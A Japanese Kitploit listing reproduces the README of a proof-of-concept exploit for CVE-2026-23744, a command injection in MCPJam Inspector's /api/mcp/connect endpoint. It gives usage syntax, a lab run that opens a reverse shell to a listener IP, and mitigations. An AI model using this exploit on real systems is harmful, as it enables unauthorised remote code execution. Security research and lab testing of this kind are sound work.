Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 は、MCPJam Inspector ≤1.4.2 の /api/mcp/connect における未認証のコマンドインジェクションです。このPOCは、細工したJSONペイロードを送信して任意のコマンドを実行させ、PTY付きリバースシェルを取得することでこれを悪用します。 | Kitploit
ツール/GitHubGitHub/mluex0/cve-2026-23744-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 は、MCPJam Inspector ≤1.4.2 の /api/mcp/connect における未認証のコマンドインジェクションです。このPOCは、細工したJSONペイロードを送信して任意のコマンドを実行させ、PTY付きリバースシェルを取得することでこれを悪用します。

リポジトリを見る
229日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744-PoC

免責事項:

この概念実証コードは、許可を得たセキュリティ研究、教育目的、および管理されたラボ環境(例: HTB、CTF、明示的な書面による同意を得た社内ペネトレーションテスト)専用に提供されています。許可なくいかなるシステムに対しても使用することは違法かつ非倫理的です。作者は悪用によって生じるいかなる責任も負いません。利用者は、適用されるすべての法律および規制を遵守する単独の責任を負います。


説明

CVE-2026-23744 は、MCPJam Inspector(バージョン ≤ 1.4.2)における認証不要のコマンドインジェクションの脆弱性です。
/api/mcp/connect エンドポイントは、serverConfig.command および serverConfig.args を含む JSON ペイロードを受け取り、それらをサニタイズ処理なしで直接システムプロセスの起動に渡します。攻撃者は細工したリクエストを送信して任意のシステムコマンドを実行し、サービスユーザーの権限でリバースシェルを取得できます。

このリポジトリには、オプションの自動 PTY ベース対話型リスナー(デフォルトで有効)を備えた完全な動作するエクスプロイトスクリプトが含まれています。


必要条件

  • Python 3.6+
  • requests ライブラリ(pip install requests)

使用方法

重要: ホスト名または IP のみを指定してください。スクリプトが自動的に http:// または https:// を追加します。

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
オプション説明
-t, --targetターゲットのホスト名または IP(必須)
-p, --portターゲットのポート(デフォルト: 6274)
-l, --lhostリバースシェル用の自分の IP(必須)
-r, --lportリスナーポート(デフォルト: 4444)
--sslHTTP の代わりに HTTPS を使用
--check-only脆弱性の確認のみ行い、シェルを送信しない

例

スクリプトが独自のリスナーを起動し、ターミナル上で直接シェルを提供します。

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

概念実証(実行成功例)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

緩和策

  • プロセス起動関数に渡されるユーザー指定の引数をすべてサニタイズする。
  • 厳格なホワイトリストと認証なしに、API エンドポイントを介した任意のコマンド実行を許可しない。
  • サービスは最小権限で実行する – 決して root では実行しない。

ライセンス

このリポジトリは、教育および許可を得たテスト目的のみに提供されています。自己責任で使用してください。

作者: Mluex0 日付: 2026年8月

ツールをダウンロード